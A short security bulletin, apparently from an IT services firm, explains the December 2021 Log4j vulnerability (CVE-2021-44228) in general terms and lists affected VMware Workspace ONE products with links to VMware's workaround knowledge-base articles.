On December 10, 2021, a 0-day exploit was discovered in the Java logging library log4j (Version2).
This 0-day has been published by The Common Vulnerabilities and Exposures CVE) project as CVE-2021-44228 and obtain the maximum CVSS risk score of 10:
Let’s take a look at the situation about VMware Workspace ONE portfolio products:
Note : We are here describing VMware's response for the Workspace ONE portfolio products only. However, many other VMware products can be also impacted.
What is Log4j 0-day exploit ?
Broadly speaking, the Log4j 0-day exploit allows an attacker to send a specific message that the targeted server will log. This message can then activate the exploit, the previously mentionned server, via the JNDI API (connection to directories), contacts another malicious server where it retrieves the malicious code.
On December 10 2021, in response to the Log4Shell exploit, VMware has published a security advisory document for all of its impacted products.
This document is available at the following URL :
Please find below the list of impacted Workspace ONE portfolio products:
- VMware Unified Access Gateway version 21.x, 20.x, 3.x
- VMware Workspace ONE Access version 21.x, 20.10.x
- VMware Identity Manager version 3.3.x
- VMware Workspace ONE Access Connector / VMware Identity Manager
Connector version 21.x, 20.10.x, 19.03.0.1
Note : Workspace ONE UEM is not impacted by this exploit as this product is based on IIS and not Java Apache.
What workarounds can be applied?
To the present day, no patch is available for all 4 above products but only workarounds.
Please find dedicated Knowledge Base to each products describing workaround instructions:
- VMware Unified Access Gateway : https://kb.vmware.com/s/article/87092
- VMware Identity Manager : https://kb.vmware.com/s/article/87093
- VMware Workspace ONE Access : https://kb.vmware.com/s/article/87090
- VMware Workspace ONE Access Connector : https://kb.vmware.com/s/article/87091
Note : It is recommended to upgrade older versions to newer supported versions first before applying the workaround. This procedure may not work for older unsupported versions.
Note : The vulnerability applies to all versions of Unified Access Gateway appliance when configured for RADIUS or RSA SecurID authentication when used with the Horizon edge service or Web Reverse Proxy edge service.
Those workarounds are therefore temporary until a patch is made available by VMware.
If you have any doubt, interrogation or questions concerning this subject feel free to contact us as soons as possible : firstname.lastname@example.org
Stay tuned for more important updates !